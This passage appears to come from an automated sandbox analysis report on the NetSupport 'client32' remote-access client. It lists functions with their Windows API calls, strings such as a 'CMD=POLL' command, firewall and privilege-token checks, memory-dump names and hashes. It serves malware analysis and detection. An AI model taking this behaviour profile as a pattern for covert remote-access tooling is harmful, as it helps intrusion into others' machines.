                                                                                                                                        • Sleep.KERNEL32(00000001,00000000,009686C7,68903361,00000000,00000000,68903361,00000007), ref: 688F92A8
                                                                                                                                        • GetTickCount.KERNEL32 ref: 688F92B0
                                                                                                                                        • Sleep.KERNEL32(00000014), ref: 688F92BC
                                                                                                                                        Strings
                                                                                                                                        • ReadSocket - Error %d reading response, xrefs: 688F92F7
                                                                                                                                        • ReadSocket - Connection has been closed by peer, xrefs: 688F92E0
                                                                                                                                        • hbuf->buflen - hbuf->datalen >= min_bytes_to_read, xrefs: 688F922B
                                                                                                                                        • e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c, xrefs: 688F9226
                                                                                                                                        • ReadSocket - Would block, xrefs: 688F928A
                                                                                                                                        • *RecvTimeout, xrefs: 688F927B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CountSleepTick$ErrorLast
                                                                                                                                        • String ID: *RecvTimeout$ReadSocket - Connection has been closed by peer$ReadSocket - Error %d reading response$ReadSocket - Would block$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$hbuf->buflen - hbuf->datalen >= min_bytes_to_read
                                                                                                                                        • API String ID: 2495545493-2497412063
                                                                                                                                        • Opcode ID: 52f58ba7c3d379e99dba053499f6df84b9518cb1548c503282d17e6a6a5e921d
                                                                                                                                        • Instruction ID: 57eb3688a52f565b4a42e078e35e0421f5974f955e23d945f67aa12c84314776
                                                                                                                                        • Opcode Fuzzy Hash: 52f58ba7c3d379e99dba053499f6df84b9518cb1548c503282d17e6a6a5e921d
                                                                                                                                        • Instruction Fuzzy Hash: 9531CE39E44208AFDB10DFB8EC84B9EB7F4EB85364F804869F928D7540E731E9418B91
                                                                                                                                        Function 68903130 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 178timethreadCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetSystemTime.KERNEL32(?,?,?,976C354D,27CEFB69,976C34B3,FFFFFFFF,00000000), ref: 689031E2
                                                                                                                                        • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000,6892ECB0), ref: 689031EC
                                                                                                                                        • GetSystemTime.KERNEL32(?,27CEFB69,976C34B3,FFFFFFFF,00000000), ref: 6890322A
                                                                                                                                        • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000,6892ECB0), ref: 68903234
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898,?,976C354D), ref: 689032BE
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000), ref: 689032D3
                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6890334D
                                                                                                                                          • Part of subcall function 6890BA20: __strdup.LIBCMT ref: 6890BA3A
                                                                                                                                          • Part of subcall function 6890BB00: _free.LIBCMT ref: 6890BB2D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Time$System$CriticalFileSection$CurrentEnterLeaveThread__strdup_free
                                                                                                                                        • String ID: 1.1$ACK=1$CMD=POLL$INFO=1
                                                                                                                                        • API String ID: 1510130979-3441452530
                                                                                                                                        • Opcode ID: 3a254c53c8c2cdb703ed1f6dd0b20b64d3ee421feee68701123ba3bbf3b5737d
                                                                                                                                        • Instruction ID: 5503bcffd3ab91c1c5c7e3103be27a87120857bdd3dee7127c21bc812eba8142
                                                                                                                                        • Opcode Fuzzy Hash: 3a254c53c8c2cdb703ed1f6dd0b20b64d3ee421feee68701123ba3bbf3b5737d
                                                                                                                                        • Instruction Fuzzy Hash: DD613D76904618AFCB14DFA8D884EEEB7B9FB49314F80851DE516A7240EB74E504CBA1
                                                                                                                                        Function 11095C90 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 58comCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 11095CA4
                                                                                                                                        • CLSIDFromProgID.COMBASE(HNetCfg.FwMgr,?,?,?,?,?,?,?,11134B2B), ref: 11095CBE
                                                                                                                                        • CoCreateInstance.OLE32(?,00000000,00000001,111BBFCC,?,?,?,?,?,?,?,11134B2B), ref: 11095CDB
                                                                                                                                        • CoUninitialize.OLE32(?,?,?,?,?,?,11134B2B), ref: 11095CF9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateFromInitializeInstanceProgUninitialize
                                                                                                                                        • String ID: HNetCfg.FwMgr$ICF Present:
                                                                                                                                        • API String ID: 3222248624-258972079
                                                                                                                                        • Opcode ID: a191ec028fc1ebe43799a3fbc6b5824768ffae445ee9dba88daea3a8dfe179cf
                                                                                                                                        • Instruction ID: 667ad4978e11a958ff0dee1adaae51f217c5ac115a2c6bb433f56a1af31716a4
                                                                                                                                        • Opcode Fuzzy Hash: a191ec028fc1ebe43799a3fbc6b5824768ffae445ee9dba88daea3a8dfe179cf
                                                                                                                                        • Instruction Fuzzy Hash: E011C2B0F0112D5FDB01DBE68C94AAFFB69AF04704F108569EA09D7244E722EE40C7E2
                                                                                                                                        Function 11072460 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 314COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memset
                                                                                                                                        • String ID: NBCTL32.DLL$_License$serial_no
                                                                                                                                        • API String ID: 2102423945-35127696
                                                                                                                                        • Opcode ID: 73eab7b1c8d7b6e70f1aa5dd4ab6e6844c03489425f04d6019e1d2487717588b
                                                                                                                                        • Instruction ID: d0e0b9ecbde65a2366102896099e84d523940e720fd040d90542ba2888ebc4af
                                                                                                                                        • Opcode Fuzzy Hash: 73eab7b1c8d7b6e70f1aa5dd4ab6e6844c03489425f04d6019e1d2487717588b
                                                                                                                                        • Instruction Fuzzy Hash: CAB1A075E00219AFEB04CF98DC91FAEB7F5FF88304F148169E9599B295DB70A901CB90
                                                                                                                                        Function 11030B10 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 40COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(1102DF30,?,00000000), ref: 11030B34
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                                        • String ID: Client32$NSMWClass$NSMWClass
                                                                                                                                        • API String ID: 3192549508-611217420
                                                                                                                                        • Opcode ID: 58515847b78de4ae681c1499d6e223a9096c2b5aadf525ec481539d2362be3c4
                                                                                                                                        • Instruction ID: 7da52f349ca3cb7d8c11f8ab613c71e219a3e37bd0be996a8dda4c31b38bef83
                                                                                                                                        • Opcode Fuzzy Hash: 58515847b78de4ae681c1499d6e223a9096c2b5aadf525ec481539d2362be3c4
                                                                                                                                        • Instruction Fuzzy Hash: 9901D674E0132EDFD346DFE4C8859AAFBB5EB8571CB148479D82887308FA71A904CB91
                                                                                                                                        Function 1109DC20 Relevance: 6.1, APIs: 4, Instructions: 86memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,7622F550,?,00000000), ref: 1109DC58
                                                                                                                                        • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109DC74
                                                                                                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,004B11D8,004B11D8,004B11D8,004B11D8,004B11D8,004B11D8,004B11D8,111EAB1C,?,00000001,00000001), ref: 1109DCA0
                                                                                                                                        • EqualSid.ADVAPI32(?,004B11D8,?,00000001,00000001), ref: 1109DCB3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InformationToken$AllocateEqualInitialize
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1878589025-0
                                                                                                                                        • Opcode ID: e1ef01c0b2a593c632c16c9fc194400e1d79a88dd1ec3329169a1e99986687c3
                                                                                                                                        • Instruction ID: 4e420e32a86b216a8c4820a584475d55105e440134d2483d273bcb85c3c049ac
                                                                                                                                        • Opcode Fuzzy Hash: e1ef01c0b2a593c632c16c9fc194400e1d79a88dd1ec3329169a1e99986687c3
                                                                                                                                        • Instruction Fuzzy Hash: A1214F71B4122EAFEB00DBA5DC91FBFF7B9EF44744F004069E915D7280E6B1A9018791
                                                                                                                                        Function 1109C750 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetCurrentProcess.KERNEL32(000F01FF,?,1102FAC3,00000000,00000000,00080000,A0A8B03E,00080000,00000000,00000000), ref: 1109C77D
                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 1109C784
                                                                                                                                        • LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109C795
                                                                                                                                        • AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109C7B9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2349140579-0
                                                                                                                                        • Opcode ID: fed7014fb2c6176395dd00bdbf9b6dacad7388df0a8d1a1889bfa0ec87585418
                                                                                                                                        • Instruction ID: 79ef21a039d637d1c16a726e2430049afe469fda3395ab205b54f21d4569a753
                                                                                                                                        • Opcode Fuzzy Hash: fed7014fb2c6176395dd00bdbf9b6dacad7388df0a8d1a1889bfa0ec87585418
                                                                                                                                        • Instruction Fuzzy Hash: 7B014071600219AFD710DF94CC89BAEF7BCEB44705F108469EA05D7240D7B06904CB61
                                                                                                                                        Function 1109C7E0 Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,?,00000000,00000000,00000000,1109DB20,00000244,cant create events), ref: 1109C7FC
                                                                                                                                        • CloseHandle.KERNEL32(?,00000000,1109DB20,00000244,cant create events), ref: 1109C805
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 81990902-0
                                                                                                                                        • Opcode ID: 07b6c080e2ef9d1b524653a43e28c47792f2e6050ec9e1d6ef6176c43a5e0348
                                                                                                                                        • Instruction ID: 2330733e60bf6a127bb8479b673e73a50ba3166191bfb56ce9f8e109ae2e049c
                                                                                                                                        • Opcode Fuzzy Hash: 07b6c080e2ef9d1b524653a43e28c47792f2e6050ec9e1d6ef6176c43a5e0348
                                                                                                                                        • Instruction Fuzzy Hash: 09E0EC71A00611ABE738CE249D95FA777ECAF08B11F21496DF956E6180CAA0E8448B64
                                                                                                                                        Function 1102E15E Relevance: 209.8, APIs: 31, Strings: 88, Instructions: 1502COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetSystemMetrics.USER32(00002000), ref: 1102E234
                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 1102E266
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateEventMetricsSystem
